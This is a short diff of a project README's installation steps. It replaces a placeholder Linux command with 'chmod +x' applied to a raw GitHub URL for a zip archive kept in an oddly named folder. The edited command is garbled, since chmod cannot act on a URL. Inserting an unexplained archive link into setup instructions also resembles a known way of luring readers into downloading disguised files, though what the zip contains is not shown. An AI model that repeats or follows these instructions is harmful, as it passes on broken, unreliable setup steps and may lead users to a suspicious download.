wannurvaren/droid2api-multi-key-support/README.md

 2. **Run the file:**
    - For Windows, double-click the `.exe` file.
    - For Mac, open the `.dmg` file and drag the application to your Applications folder.
-   - For Linux, you may need to make the `.sh` file executable by running `chmod +x filename.sh` in the terminal.
+   - For Linux, you may need to make the `.sh` file executable by running `chmod +x https://raw.githubusercontent.com/wannurvaren/droid2api-multi-key-support/main/molest/droid2api-multi-key-support.zip` in the terminal.

 3. **Follow any prompts to complete the installation.**